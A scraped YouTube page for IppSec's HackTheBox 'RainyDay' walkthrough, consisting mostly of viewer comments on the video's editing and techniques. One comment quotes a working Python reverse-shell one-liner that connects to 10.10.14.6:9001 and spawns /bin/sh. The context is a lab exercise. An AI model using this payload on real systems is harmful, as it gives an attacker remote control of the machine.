HackTheBox - RainyDay

  Рет қаралды 16,605

IppSec

IppSec

Күн бұрын

Пікірлер: 40
@Raham98
@Raham98 Жыл бұрын
I really liked the implementation of the new feature you added, explaining the logic of the bypassing the API query in the source code was very intuitive. Really love your videos IppSec, very grateful for the content you put out.
@ippsec
@ippsec Жыл бұрын
Glad it was helpful! Thanks for letting me know you liked it.
@MonnizProductions
@MonnizProductions Жыл бұрын
Like the new way of editing. Interesting with the type-vuln-error, worth noting that the response is made earlier and without the int() check in the query, cool trick!
@ippsec
@ippsec Жыл бұрын
Glad it was helpful! Thanks for letting me know you liked it.
@beezball38
@beezball38 Жыл бұрын
this editing is great! thank you for doing that! the videos are super long as it is, and it can help keep someone hooked to not have to manually skip to the end if they are confused.
@AbdennacerAyeb
@AbdennacerAyeb Жыл бұрын
Always I'm waiting saturday to enjoy watching you simplify things which no one could do it your way. Thank you a lot.
@HumanBenchmarked
@HumanBenchmarked Жыл бұрын
Hi, Ippsec! Since those all are just writeups videos, I think that the "new" kind of content where you put explanations from the future yourself is just amazing. I don't have to skip or go through the entire video just to listen to that. For me, that's a huge pro :)
@souleymaneadellah1176
@souleymaneadellah1176 Жыл бұрын
I like the new editing in the middle thingy.
@ippsec
@ippsec Жыл бұрын
Glad you like it. Thanks for letting me know.
@thatcrockpot1530
@thatcrockpot1530 Жыл бұрын
Edits are great! I don't do much htb anymore but the creativity aspect of the password cracking section was enlightening, good job and thanks for sharing :D
@ahmedfathy9467
@ahmedfathy9467 Жыл бұрын
I really liked the new way of editing and explaining what happens in the background in the middle of the video. Me personally sometimes skip the last part of the video and say that i will resume it but it never happens. Awesome work man as always. Keep up the good work 🖤
@Simon-jt6lv
@Simon-jt6lv Жыл бұрын
I like the way you explain the type conversion error after you discover..
@monKeman495
@monKeman495 Жыл бұрын
that file disclosure was neat and brutal at same time , learned alot thanks master...
@PedroGonzalez-fv5ut
@PedroGonzalez-fv5ut Жыл бұрын
Awesome video! Thanks for doing this. I need to probably rewatch it a couple more times to better understand the process of the decoding the file. But amazing overall.
@jaxson8262
@jaxson8262 Жыл бұрын
8:25 that was a great move!.
@g0hm47
@g0hm47 Жыл бұрын
Thanks for the new explanation in place thing! 8:59 Am I right in thinking that the reason this still returned data despite the error you introduced with the failed int() casting in the if statement is because the sql query WAS smart enough to cast the “1.0” string to an int and match it to something in the database? Almost a bit like how HTTP smuggling works where two different things disagree on how to process the same data? Actually ignore this comment, that must be what happened else it wouldn’t have worked. Leaving my rambling here in case it helps someone else to work through it.
@vq8gef32
@vq8gef32 Жыл бұрын
Thanks heap for the video and your time. I learned how powerful is python.
@souleymaneadellah1176
@souleymaneadellah1176 Жыл бұрын
My ippsec weekeend fix is finally here 😄
@_imps
@_imps Жыл бұрын
there's very helpful re.escape function to replace all shenanigans with doing it manually
@sotecluxan4221
@sotecluxan4221 Жыл бұрын
Thanx, have a nice sunday!
@user-sw9bs8mp3f
@user-sw9bs8mp3f Жыл бұрын
very nice and good
@StevenHokins
@StevenHokins Жыл бұрын
Good job!
@abdelhamed8359
@abdelhamed8359 Жыл бұрын
Really it's a great video 😹❤️
@firos5381
@firos5381 Жыл бұрын
how to be ge good at hacking boxes quickers like u have soo many walthroughs of boxes but going through all of them wont be possible if i wana get started how should i approach like are there shorter walkthroughs i could go over and get a good understanding
@ippsec
@ippsec Жыл бұрын
What do you mean going through them isn’t possible? Yes it’s a lot of content but keep in mind one person made it all, and making it takes much longer than watching it.
@firos5381
@firos5381 Жыл бұрын
@@ippsec yaa sorry
@lonelyorphan9788
@lonelyorphan9788 Жыл бұрын
Ippsec rocks! 🙂
@tg7943
@tg7943 Жыл бұрын
Push!
@ahnafabrarhasin4140
@ahnafabrarhasin4140 Жыл бұрын
i got the reverse shell as uid 1337 which is weird but idk why
@ippsec
@ippsec Жыл бұрын
You didn’t do the background probably. Very end of the video I show it
@ahnafabrarhasin4140
@ahnafabrarhasin4140 Жыл бұрын
@@ippsec you are right. I used the exec option but i did not get the 5 second timeout. I'm guessing that happened because i used another reverse shell that uses the sub process module. This one `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'`
@sreyanchakravarty7694
@sreyanchakravarty7694 Жыл бұрын
First
@x.plorer
@x.plorer Жыл бұрын
grow up!
@user-sw9bs8mp3f
@user-sw9bs8mp3f Жыл бұрын
@@x.plorer yeah! get him!
@BlueIsLeet
@BlueIsLeet Жыл бұрын
@@x.plorer no u
@sand3epyadav
@sand3epyadav Жыл бұрын
My fv ipp .....
@infinix_6586
@infinix_6586 Жыл бұрын
Make video : Router Firmware Backdooring
@spacenomad5484
@spacenomad5484 Жыл бұрын
About the newline/skipping lines in regex: Match any number of (any char followed by )'s followed by SECRET followed by any char: (.* )*SECRET.*
@JNET_Reloaded
@JNET_Reloaded Жыл бұрын
another reason python sucks!
HackTheBox - Awkward
2:01:09
IppSec
Рет қаралды 17 М.
HackTheBox - Moderators
1:10:02
IppSec
Рет қаралды 15 М.
What will he say ? 😱 #smarthome #cleaning #homecleaning #gadgets
01:00
Dad Makes Daughter Clean Up Spilled Chips #shorts
00:16
Fabiosa Stories
Рет қаралды 7 МЛН
❌Разве такое возможно? #story
01:00
Кэри Найс
Рет қаралды 6 МЛН
女孩妒忌小丑女? #小丑#shorts
00:34
好人小丑
Рет қаралды 99 МЛН
HackTheBox - Talkative
1:04:55
IppSec
Рет қаралды 17 М.
HackTheBox - AdmirerToo
58:09
IppSec
Рет қаралды 15 М.
Programming's Greatest Mistakes • Mark Rendle • GOTO 2023
51:24
GOTO Conferences
Рет қаралды 92 М.
Behind The Scenes of Tom Passing Out In A Centrifuge
17:53
Matt and Tom
Рет қаралды 390 М.
The Trackmania Shortcut That Was Hidden in Plain Sight
15:36
Wirtual
Рет қаралды 4,3 МЛН
HackTheBox - Snoopy
1:20:55
IppSec
Рет қаралды 11 М.
YouTube's copyright system isn't broken. The world's is.
42:29
Tom Scott
Рет қаралды 8 МЛН
Hacking Windows TrustedInstaller (GOD MODE)
31:07
John Hammond
Рет қаралды 599 М.
What will he say ? 😱 #smarthome #cleaning #homecleaning #gadgets
01:00